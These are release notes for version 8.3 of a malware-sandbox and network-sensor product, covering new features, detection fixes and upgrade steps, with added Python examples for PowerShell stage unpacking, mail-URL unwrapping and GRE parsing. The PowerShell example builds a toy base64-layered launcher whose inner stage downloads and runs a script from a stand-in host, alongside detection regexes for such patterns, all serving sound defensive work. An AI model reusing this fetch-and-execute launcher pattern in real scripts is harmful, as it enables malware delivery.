Lastline Enterprise On-Premises Release Notes

Version 8.3

New Features

  • Move analysis on macOS/Apple hardware from beta into GA
  • Extract URLs from executed scripts during sandbox analysis
  • Scan every stage of executed PowerShell script with YARA rules
  • Extract stages of PowerShell script execution
  • New portal sitemap and navigation structure
  • Display new intrusion impact score
  • Support analysis of URLs that are rewritten by third party products in mail
  • New dynamic analysis framework for web attacks
  • Sniffing support for GRE encapsulation
  • Add new permissions for viewing and managing custom intelligence
  • Configure data-retention for analysis results
  • Support ICAP Blocking on sniffing events

MOVE ANALYSIS ON MACOS/APPLE HARDWARE FROM BETA INTO GA

The Lastline Manager now supports deep dynamic analysis of applications on macOS. This requires additional Engine appliances configured on Apple hardware, to comply with Apple licensing restrictions.

This feature was previously available in beta only and is now marked generally available.

This new feature was tracked internally as FEAT-3877.

EXTRACT URLS FROM EXECUTED SCRIPTS DURING SANDBOX ANALYSIS

The sandbox performs a deeper analysis of the Microsoft PowerShell framework and extracts URLs from the executed scripts, even if the URLs were not used by the script to perform network activity.

This new feature was tracked internally as FEAT-3812.

SCAN EVERY STAGE OF EXECUTED POWERSHELL SCRIPT WITH YARA RULES

The sandbox performs a deeper analysis of the Microsoft PowerShell framework and scans all stages of executed scripts with YARA signatures.

This new feature was tracked internally as FEAT-3759.

EXTRACT STAGES OF POWERSHELL SCRIPT EXECUTION

The analysis sandbox now monitors more internals of the Microsoft PowerShell framework. This allows extraction of all stages of a PowerShell script, including packed or encrypted stages. The script code is used for more precise detection of anomalous behavior and is made available for download, just like files written to disk.

This new feature was tracked internally as FEAT-3758.
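The three PowerShell features above (URL extraction from executed scripts, per-stage rule scanning, and stage extraction) share one idea: a launcher carries its later stages as encoded blobs, so each decoded stage must be treated as its own artifact. The following Python is an added example and not Lastline's sandbox code; it unpacks a constructed three-stage launcher statically (the sandbox does it at run time), extracts URLs from every stage whether or not the script would ever contact them, and scans each stage with regexes that stand in for the YARA rules the product uses. STAGE0..STAGE2, the example.test URLs and the rule names are all assumptions constructed for this example.

```python
import base64
import re

# --- constructed three-stage sample (assumption: a toy launcher, not real malware) ---
# Stage 2 (innermost): the code that would fetch a further payload.
STAGE2 = '(New-Object Net.WebClient).DownloadString("http://updates.example.test/stage3.ps1")'
# Stage 1: decodes stage 2 from base64, runs it, and carries a URL it never contacts.
STAGE1 = (
    '$u = "https://cdn.example.test/not-used"; '
    '$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("'
    + base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")
    + '")); IEX $s'
)
# Stage 0: the command line, carrying stage 1 as base64 of UTF-16LE (what -EncodedCommand takes).
STAGE0 = "powershell.exe -EncodedCommand " + base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")

# Carriers of a nested stage: -EncodedCommand (and its short forms) and FromBase64String("...").
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
FROM_B64_RE = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]{16,})[\"']\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)

# Stand-in for YARA rules (assumption: plain regexes here; the product uses real YARA).
RULES = {
    "ps_encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "ps_base64_decode": re.compile(r"FromBase64String", re.I),
    "ps_invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "ps_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
}


def decode_blob(blob):
    """Base64-decode a stage; choose UTF-16LE vs UTF-8 by counting NUL bytes at odd offsets."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_stages(script, max_depth=8):
    """Return every execution stage reachable by unpacking base64 carriers, breadth first."""
    stages, seen, frontier = [script], {script}, [script]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            for regex in (ENCODED_CMD_RE, FROM_B64_RE):
                for match in regex.finditer(text):
                    decoded = decode_blob(match.group(1))
                    if decoded and decoded not in seen:
                        seen.add(decoded)
                        nxt.append(decoded)
        if not nxt:
            break
        stages.extend(nxt)
        frontier = nxt
    return stages


def extract_urls(stages):
    """URLs present in any stage, whether or not the script would ever request them."""
    return sorted({m.group(0) for s in stages for m in URL_RE.finditer(s)})


def scan_stages(stages, rules=RULES):
    """Names of rules matching each stage, index-aligned with `stages`."""
    return [[name for name, rx in rules.items() if rx.search(s)] for s in stages]


if __name__ == "__main__":
    found = extract_stages(STAGE0)
    for i, (stage, hits) in enumerate(zip(found, scan_stages(found))):
        print("stage %d hits=%s: %.70s" % (i, hits, stage))
    print("URLs:", extract_urls(found))
```

Only stage 2 contains a download call and only stage 1 contains the unused URL, so rules run against stage 0 alone (the command line) would see neither; scanning every stage is what makes both visible.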

NEW PORTAL SITEMAP AND NAVIGATION STRUCTURE

The portal sitemap and navigation structure have been upgraded, resulting in improved workflows and user experience. Some highlights include:

  • Intrusions, Hosts, Events, Incidents, Downloads and Network Analysis sections are now found under the new Network tab
  • Appliances section is now found under the Admin tab
  • Multiple new and updated navigation elements have been introduced
  • Redirects have been implemented to preserve most existing direct links into the portal, from notifications and elsewhere

This new feature was tracked internally as FEAT-3748.

DISPLAY NEW INTRUSION IMPACT SCORE

A new impact score was introduced for intrusions. The score is available for each intrusion in the Intrusions list and in the header of the intrusion details page.

This new feature was tracked internally as FEAT-3593.

SUPPORT ANALYSIS OF URLS THAT ARE REWRITTEN BY THIRD PARTY PRODUCTS IN MAIL

Certain mail security products rewrite URLs identified in emails so that the URL is analyzed whenever the user visits it. Such rewriting impaired the sensor's ability to analyze the structure of the original URL and decide on its maliciousness. The sensor now detects and correctly handles the URL rewriting techniques applied by common vendors.

This new feature was tracked internally as FEAT-3570.
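To make the problem concrete: a rewritten link points at the mail product's click-tracking host and carries the real destination percent-encoded in a query parameter, so a sensor that classifies the URL as seen would judge the vendor's host instead of the original. The Python below is an added example, not the sensor's implementation, and it makes no claim about any real vendor's format: the two wrapper hosts and parameter names in WRAPPERS are constructed for the example. It peels wrappers off recursively up to a depth limit, tolerates a doubly-encoded payload, and refuses to follow into non-web schemes.

```python
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Constructed wrapper shapes for this example (assumption: real products use
# their own hosts and parameter names; the sensor's vendor list is not public).
WRAPPERS = {
    "rewrite.mailsec.example": "url",     # ?url=<percent-encoded original>
    "click.mailsec.example": "target",    # ?target=<percent-encoded original>
}


def unwrap_url(url, wrappers=WRAPPERS, max_depth=4):
    """Peel known rewrite wrappers off `url`; returns (url, layers_removed)."""
    current, depth = url, 0
    while depth < max_depth:
        parts = urlsplit(current)
        param = wrappers.get((parts.hostname or "").lower())
        if param is None:
            break                                # not a wrapper: analyze as-is
        values = parse_qs(parts.query).get(param)
        if not values:
            break                                # wrapper host without a payload
        candidate = values[0]                    # parse_qs already decoded once
        if not urlsplit(candidate).scheme and "%" in candidate:
            candidate = unquote(candidate)       # tolerate a doubly-encoded payload
        inner = urlsplit(candidate)
        if inner.scheme not in ("http", "https") or not inner.netloc:
            break                                # only follow into web URLs
        current, depth = candidate, depth + 1
    return current, depth


# Constructed samples (assumption: not captured from a real product).
SAMPLE_ORIGINAL = "https://www.example.com/login?id=42"
SAMPLE_WRAPPED = ("https://rewrite.mailsec.example/?url="
                  + quote(SAMPLE_ORIGINAL, safe="") + "&data=abc")
SAMPLE_DOUBLE = "https://click.mailsec.example/?target=" + quote(SAMPLE_WRAPPED, safe="")
SAMPLE_NONWEB = ("https://rewrite.mailsec.example/?url="
                 + quote("ftp://files.example.net/a", safe=""))

if __name__ == "__main__":
    for sample in (SAMPLE_ORIGINAL, SAMPLE_WRAPPED, SAMPLE_DOUBLE, SAMPLE_NONWEB):
        print(unwrap_url(sample))
```

The depth counter is worth keeping in the result: a URL that is still wrapped after max_depth layers is itself suspicious, and the caller can submit the outermost form for analysis rather than silently trusting a partial unwrap.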

NEW DYNAMIC ANALYSIS FRAMEWORK FOR WEB ATTACKS

This release adds a new dynamic analysis sandbox for detecting web-based attacks. The framework supports scanning URLs as well as file-based attacks, and it complements the existing sandboxes used for scanning submissions. The new framework:

  • improves extraction of JavaScript executed by the browser,
  • extracts screenshots of visited web pages, and
  • allows significantly faster scanning of benign sites.

This new feature was tracked internally as FEAT-3398.

SNIFFING SUPPORT FOR GRE ENCAPSULATION

The sensor now supports sniffing of traffic encapsulated using the GRE protocol.

This new feature was tracked internally as FEAT-3393.
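The note above says only that GRE-encapsulated traffic is now sniffed. What that requires of a sensor is shown by the following Python, an added example that is not Lastline's sensor code: strip the GRE header (the RFC 2784 base header plus the RFC 2890 key and sequence extensions), verify the optional checksum, and hand the inner IPv4 packet on so that the addresses inside the tunnel, not the tunnel endpoints, are the ones inspected. The packet is constructed inline by build_gre and sample_ipv4; those helpers and the addresses are assumptions made for the example.

```python
import socket
import struct

ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_IPV6 = 0x86DD
GRE_FLAG_CHECKSUM = 0x8000   # C bit (RFC 2784)
GRE_FLAG_KEY = 0x2000        # K bit (RFC 2890)
GRE_FLAG_SEQUENCE = 0x1000   # S bit (RFC 2890)
GRE_VERSION_MASK = 0x0007    # version 0 is plain GRE; version 1 is PPTP's enhanced GRE


def inet_checksum(data):
    """Internet one's-complement checksum (RFC 1071); 0 means `data` verifies."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_gre(data):
    """Split a GRE packet into its header fields and the encapsulated payload."""
    if len(data) < 4:
        raise ValueError("truncated GRE header")
    flags, proto = struct.unpack("!HH", data[:4])
    if flags & GRE_VERSION_MASK:
        raise ValueError("unsupported GRE version %d" % (flags & GRE_VERSION_MASK))
    hdr, offset = {"protocol": proto}, 4
    if flags & GRE_FLAG_CHECKSUM:          # checksum (2) + reserved1 (2)
        if len(data) < offset + 4:
            raise ValueError("truncated GRE checksum field")
        hdr["checksum"] = struct.unpack("!H", data[offset:offset + 2])[0]
        hdr["checksum_ok"] = inet_checksum(data) == 0   # covers header and payload
        offset += 4
    if flags & GRE_FLAG_KEY:
        if len(data) < offset + 4:
            raise ValueError("truncated GRE key field")
        hdr["key"] = struct.unpack("!I", data[offset:offset + 4])[0]
        offset += 4
    if flags & GRE_FLAG_SEQUENCE:
        if len(data) < offset + 4:
            raise ValueError("truncated GRE sequence field")
        hdr["sequence"] = struct.unpack("!I", data[offset:offset + 4])[0]
        offset += 4
    hdr["header_len"] = offset
    hdr["payload"] = data[offset:]
    return hdr


def inner_ipv4_addrs(payload):
    """Source and destination of the encapsulated IPv4 packet, as dotted quads."""
    if len(payload) < 20 or payload[0] >> 4 != 4:
        raise ValueError("payload is not an IPv4 packet")
    return socket.inet_ntoa(payload[12:16]), socket.inet_ntoa(payload[16:20])


# --- constructed test traffic (assumption: built here, not captured) ---------------
def sample_ipv4(src, dst, udp_payload=b"hello"):
    """Minimal IPv4/UDP packet; IP and UDP checksums left zero (not needed here)."""
    total_len = 20 + 8 + len(udp_payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    udp = struct.pack("!HHHH", 53, 53, 8 + len(udp_payload), 0) + udp_payload
    return ip + udp


def build_gre(proto, payload, key=None, seq=None, with_checksum=False):
    """Encapsulate `payload` in GRE, filling in the checksum over header + payload."""
    flags, opts = 0, b""
    if with_checksum:
        flags |= GRE_FLAG_CHECKSUM
        opts += struct.pack("!HH", 0, 0)     # checksum placeholder + reserved1
    if key is not None:
        flags |= GRE_FLAG_KEY
        opts += struct.pack("!I", key)
    if seq is not None:
        flags |= GRE_FLAG_SEQUENCE
        opts += struct.pack("!I", seq)
    pkt = struct.pack("!HH", flags, proto) + opts + payload
    if with_checksum:
        pkt = pkt[:4] + struct.pack("!H", inet_checksum(pkt)) + pkt[6:]
    return pkt


if __name__ == "__main__":
    gre = build_gre(ETHERTYPE_IPV4, sample_ipv4("10.0.0.1", "192.0.2.7"), key=42, seq=7,
                    with_checksum=True)
    parsed = parse_gre(gre)
    print({k: v for k, v in parsed.items() if k != "payload"})
    print("inner flow:", inner_ipv4_addrs(parsed["payload"]))
```

The version check matters in practice: PPTP uses GRE version 1 with a different header layout, so a parser that assumed version 0 for every GRE packet would mis-read those headers and carve the wrong bytes out as the inner packet.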

ADD NEW PERMISSIONS FOR VIEWING AND MANAGING CUSTOM INTELLIGENCE

This release introduces two new permissions related to customer-provided intelligence:

  • can_manage_custom_intel: Ability to manage custom intelligence entries (add, edit, delete)
  • can_view_custom_intel: Ability to get a listing of all custom threat intelligence entries and full information on individual entries

These permissions apply to all customer-provided intelligence that the product supports, such as custom IP and domain blacklists, custom IDS signatures, and custom NTA rules.

This new feature was tracked internally as FEAT-3211.

CONFIGURE DATA-RETENTION FOR ANALYSIS RESULTS

The appliance configuration now allows analysis results to be marked for deletion after a configurable amount of time. After that time, detailed analysis results, such as the sandbox report and any metadata files (for example screenshots or network traffic captures), are no longer available for download, which limits the space these results consume on large installations.

This new feature was tracked internally as FEAT-2331.

SUPPORT ICAP BLOCKING ON SNIFFING EVENTS

This release brings major architectural changes to the sensor that affect both explicit proxy and ICAP operation.

The ICAP service on the sensor now acts on blocking detections triggered by the sniffing component, so a sensor performing both ICAP blocking and sniffing can effectively block URLs associated with sniffing events.

When the sensor runs in explicit proxy mode, the traffic flowing through the proxy is now fully inspected for suspicious network interactions, including C&C and drive-by events.

This new feature was tracked internally as FEAT-1284.

Detection Improvements

  • TRES-330: Improved detection of command-line argument spoofing by malicious MS Office macros.
  • TRES-291: Improved detection of PDFs with embedded malicious URLs in the Lastline document prefilter.
  • TRES-234: More robust extraction of malformed XML streams from Microsoft Office documents.
  • TRES-74: Improved detection of the Cold River malware family.
  • MALS-2761: Better detection of suspicious web sites hosted on known-bad IPs.
  • FEAT-3927 LLAM-3603: Improved handling of evasive/stalling code using operating system timers.
  • LLAM-2763: Improved handling of evasive/stalling code using operating system task scheduling.
  • LLAM-2402: Improved handling of evasive code fingerprinting operating system network configuration.
  • SIGLOGSCAN-195: Improved classification of suspicious memory allocations in Microsoft Office.
  • SIGLOGSCAN-336: Better detection of anomalous violations of Windows file and directory naming conventions.
  • LLAM-4396: Improved handling of Microsoft Office security warnings preventing execution of distrusted content.
  • LLAM-2577: Better user-emulation of Windows background processes.
  • LLAM-4358: Improved handling of Microsoft Office documents requiring specific user environment.
  • LLADOC-685: More robust classification of Microsoft Office macros with the ability to download files.
  • LLADOC-699: Improved detection of invoking shell commands from Microsoft Office macros.
  • SIGREPSCAN-571 LLADOC-652: Improved detection of exploits against Equation Editor.
  • SIGREPSCAN-566 SIGREPSCAN-562: Improved detection of using system utilities for downloading malware payload.
  • SIGREPSCAN-561: Improved detection of anomalous process restarts.
  • SIGREPSCAN-565: Improved detection of Vflooder Trojan.
  • SIGREPSCAN-553: Improved detection of online games password stealers.
  • SIGREPSCAN-557: Improved detection of credentials theft.
  • SIGLOGSCAN-347: Improved detection of CosmicDuke.
  • SIGLOGSCAN-342: Improved detection of Eldos RawDisk drivers.
  • SIGLOGSCAN-338: Improved detection of Carberp.
  • SIGLOGSCAN-339: Improved detection of CVE-2018-15982.
  • FEAT-3718 LLADOC-566: Improved detection of the target OS for dynamic analysis of documents.
  • LLADOC-612: Improved detection of macros accessing Microsoft Outlook account data.
  • LLADOC-658: More robust extraction of document contents from very large documents.
  • LLADOC-668 LLADOC-670 LLADOC-672 LLADOC-674: Improved extraction of OLE data from Microsoft Office documents.
  • LLADOC-669: More robust parsing of object metadata from RTF documents.
  • LLADOC-673: More robust classification of executables embedded in Microsoft Office documents.
  • LLADOC-680 LLADOC-681: Improved extraction of Equation Editor OLE data from RTF documents.
  • LLAM-3441: Improved analysis of Microsoft Windows DLLs with non-default entry points.
  • LLAM-4056: Improved dynamic analysis of SettingContent-ms files.
  • MALS-2750: Improved dynamic analysis of MS Publisher documents.
  • SIGLOGSCAN-20 SIGLOGSCAN-21 SIGLOGSCAN-22: Improved detection of system fingerprinting for virtual environments.
  • SIGLOGSCAN-23: Improved detection of system fingerprinting for Winsock Packet Editor Pro.
  • SIGLOGSCAN-290 SIGLOGSCAN-329: Improved detection of shellcode.
  • SIGLOGSCAN-305: Improved detection of malware checking for the presence of a debugger.
  • SIGLOGSCAN-310: Improved detection of Mughthesec.
  • SIGLOGSCAN-326: Improved detection of PUA/Spigot.
  • SIGLOGSCAN-328: Improved detection of disabling kernel memory protection.
  • SIGLOGSCAN-330: Improved detection of PUA/InstallCore.
  • SIGLOGSCAN-331: Improved detection of PUA/Linkury.
  • SIGLOGSCAN-333: Improved detection of scriptlet execution.
  • SIGREPSCAN-219: Improved detection of anomalous PowerShell invocation.
  • SIGREPSCAN-230: Improved detection of banking trojans.
  • SIGREPSCAN-496 SIGREPSCAN-551: More robust classification of nested components in legitimate installer software.
  • SIGREPSCAN-520: Improved detection of malware fingerprinting browsers in headless mode.
  • SIGREPSCAN-546: More robust classification of code accessing IP addresses without prior DNS resolution.
  • SIGREPSCAN-6 SIGREPSCAN-545: Improved detection of modifications to Windows autostart behavior.
  • FEAT-3622 LLADOC-604: Improved extraction of OLE2.0 streams from Microsoft Office documents.
  • LLADOC-644 LLADOC-308 LLFILE-326: More robust detection of Microsoft Support Diagnostic cab files.
  • LLADOC-645: Improved extraction of zlib-compressed objects embedded in Microsoft Office documents.
  • LLADOC-650: Improved extraction of objects/metadata from RTF documents.
  • LLADOC-651: Improved extraction of email body text using RTF encoding.
  • LLADOC-653: More robust detection of embedded remote OLE objects in Microsoft Office documents.
  • LLADOC-661 LLADOC-662: Improved extraction of files embedded in Microsoft Office CDF documents.
  • SIGLOGSCAN-229: Improved detection of Turla Carbon.
  • SIGLOGSCAN-288: More robust detection of documents containing suspicious URLs.
  • SIGLOGSCAN-323: Improved detection of Mimikatz.
  • FEAT-3250: Improved dynamic analysis and detection of SettingContent-ms files.

Bug Fixes and Improvements

  • USER-3153: Metric graphs across the portal have been improved to show the maximum Y-axis value in the correct format.
  • SENT-1033: If a customer-defined IP whitelist is present on the sensor (/etc/lastline/customer_whitelist_ips.txt), it is now consistently honored by all sniffing components for both endpoints of a connection. Previous releases incorrectly failed to apply the whitelist to clients involved in file uploads.
  • SENT-1030: Fixed a problem that caused the sensor to raise the warning "service disabled but running" when the sensor lacks an Email Defender license.
  • SENT-1027: Fixed an ICAP bug that caused an unreasonable analysis load when processing HTTP POST requests.
  • PLTF-664: Fixed a bug that, under certain circumstances, could lead to license extensions not being propagated to the on-premises installation.
  • MALS-2803: More robust recovery after database failures while processing analysis submissions in the Lastline Analyst API.
  • MALS-2793: Improved documentation of macOS sandbox report fields.
  • MALS-2739: Removed duplicate tags from analysis reports.
  • LLMAIL-480: Correctly report the number of delivery failure notifications generated by the sensor in the appliance monitoring pages.
  • LLFILE-435: Improved file type detection of ISO files.
  • LLFILE-432: Improved file type detection for password-protected RAR5 files.
  • LLFILE-431: More robust file type detection for Microsoft Office CSV files.
  • LLFILE-429: Improved file type classification for appx files.
  • LLADOC-682: More robust extraction of script attachments from email messages for subsequent dynamic analysis.
  • FEAT-3817: Improved extraction of document content from Microsoft Office CDF file types.
  • FEAT-3769: Improved extraction of document content from Microsoft Office OpenXML, XPS, and PDF file types.
  • FEAT-3768: Fixed an API performance issue that could make the display of intrusion details very slow for certain customers.
  • FEAT-3751: Display additional DNS response information in sandbox analysis reports.
  • FEAT-3737: Improved Analyst API documentation for the handling of tar-gz archives and Microsoft Office document templates.
  • FEAT-3712: Correctly report the real filename in the captured malware tab when a content disposition header is detected.
  • FEAT-3696: Propagate more malware network IOC information into the user portal.
  • FEAT-3638: The New detections widget on the Overview dashboard has been improved to better communicate the unique nature and context of listed detections and to provide more supporting evidence. The widget now also displays the threat associated with each listed detection.
  • FEAT-3615: The utility for measuring the disk usage of analysis result files now allows printing the number of files on disk (in addition to the total space used). This supports re-configuring data-retention of disks containing an abundance of files.
  • FEAT-3569: The navigation header bar and main menu drawer have been modified to enable an improved user experience.
  • FEAT-3361: The intrusion details overview tab now includes an intrusion summary section.
  • FEAT-2706: Fixed an issue that could lead to the license being displayed as expired on its last valid day.

Deprecation of API methods

No additional API methods are being deprecated or discontinued in this release.

The Lastline API documentation includes a deprecation schedule for methods in the legacy API, as well as information on how to replace usage of these deprecated methods with supported methods.

Released appliance versions

As part of this release, we are making available the following versions of Lastline appliances for use with Lastline Enterprise On-Premises:

  • Lastline Manager version 1050
  • Lastline Engine version 1050
  • Lastline Sensor version 1052
  • Lastline All-in-one (Pinbox) version 1050

Released sandbox images versions

The sandbox images version was updated to 2018-12-31-01.

Distribution Upgrade

Version 8.3 will be the final version that supports Ubuntu Trusty as our operating system distribution. In all future releases, Ubuntu Xenial will be required. To support this distribution upgrade, version 8.3 will support both Ubuntu Trusty and Ubuntu Xenial. Before upgrading to any versions post-8.3, appliances on Ubuntu Trusty must be upgraded to Ubuntu Xenial while running version 8.3. Be prepared for this upgrade to take at least one hour. Additionally, this upgrade will require a reboot.

You can check the distribution in use by an appliance in the Appliance Status view of the portal. The "Base Distribution" listed should be "xenial". If it is "trusty", the appliance distribution should be upgraded.

For help on the upgrade process, please refer to the following instructions. This update is not done automatically to prevent unexpected downtime.
